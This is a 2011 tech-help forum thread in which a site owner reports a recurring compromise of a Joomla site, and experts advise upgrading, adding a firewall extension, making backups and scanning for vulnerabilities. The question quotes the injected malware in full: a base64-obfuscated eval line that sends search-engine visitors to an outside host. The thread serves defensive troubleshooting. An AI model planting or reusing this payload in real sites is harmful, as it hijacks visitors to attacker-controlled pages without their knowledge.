Solved

Joomla Exploit

Posted on 2011-09-21
7
1,013 Views
Last Modified: 2012-05-12
We are being attacked weekly with the same code.

Added to the changelog, configuration, credits, license, index php files is the code (after the <?php>

I remove the code when i see the files have been modified which seems to be weekly... but they return.  

The code added is attached.

I know a resolution would be to upgrade to 1.7 Joomla but am hoping to find a more expedient and less costly for my client.
<?php	                                       	eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsKCWV4aXQoKTsKCX0KfQp9Cgl9"));

Open in new window

0
Comment
Question by:bborner
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
7 Comments
 
LVL 13

Accepted Solution

by:
Andrew Derse earned 250 total points
ID: 36576543
Well for starters you should at least upgrade to Joomla 1.5.23.  Joomla 1.5.6 is much less secure than that.

Please let me know if you need help in finding the upgrade files.

Also, please check into RS Firewall, it does cost a little bit of $$, but it WILL help you in your fight against the hackers.

Main goal though is to get upgraded to 1.5.23 first.
0
 
LVL 13

Expert Comment

by:Andrew Derse
ID: 36576559
Here's a link for RS Firewall:
http://www.rsjoomla.com/joomla-extensions/joomla-security.html

And a link for the 1.5.23 upgrade from your version:
http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5848

*Also make sure you backup your website on a regular basis.  Akeeba Backup will assist with that.
http://extensions.joomla.org/extensions/access-a-security/site-security/backup/1606

Please let me know if you need any additional help.
0
 

Author Comment

by:bborner
ID: 36577975
Great advice ... will take it one step at a time starting with akeeba.
Will get back to you with progress.
Thanks
0
RoboForm Secure Password Management System

RoboForm Everywhere - Superb Browser Support
Windows / Apple / IOS / Android / Linux / Chrome OS
Use different complex passwords everywhere
Best Secure Password Management by far
Synchronize all of your devices instantly
Safe, Secure & Highly Recommended!

 
LVL 13

Expert Comment

by:Andrew Derse
ID: 36579533
Sounds good.
0
 
LVL 15

Expert Comment

by:Russell_Venable
ID: 36581860
Can't tell you what there using as the code you posted got edited by the moderators, it seems atleast.
0
 
LVL 15

Assisted Solution

by:Russell_Venable
Russell_Venable earned 250 total points
ID: 36582192
You can scan your website using the joomla vulnerability scanner which is made by yehs, which is a ethical hacker group dedicated in finding and patching these vulnerability's. So credentials are valid and trustable.

You can download it from owsap or there own site both links are on this page. https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project

Atleat this will give you a idea of what fixes you need to look out for ad what php file is giving the problem.


0
 
LVL 14

Expert Comment

by:Allan Nisbet
ID: 36585995
Yeah the code seems edited so i cant see where they are attacking

Feel free to email me the code via the contact form on our profile site

Should be fairly easy to block this, we had one similar through com_properties that looks like a similar exploit

also get Admin Tools as it adds lots of features to the site for security protection

Storm
0

Featured Post

Independent Software Vendors: We Want Your Opinion

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
Isolate data from the internet 11 73
Reading a syslog for a botnet 12 89
remove chinese softwares 22 208
Customizing themes 14 128
This article summarizes using a simple matrix to map the different type of phishing attempts and its targeted victims. It also run through many scam scheme scenario with "real" phished emails. There are safeguards highlighted to stay vigilance and h…
You cannot be 100% sure that you can protect your organization against crypto ransomware but you can lower down the risk and impact of the infection.
Finding and deleting duplicate (picture) files can be a time consuming task. My wife and I, our three kids and their families all share one dilemma: Managing our pictures. Between desktops, laptops, phones, tablets, and cameras; over the last decade…
This video shows how to use Hyena, from SystemTools Software, to update 100 user accounts from an external text file. View in 1080p for best video quality.

738 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question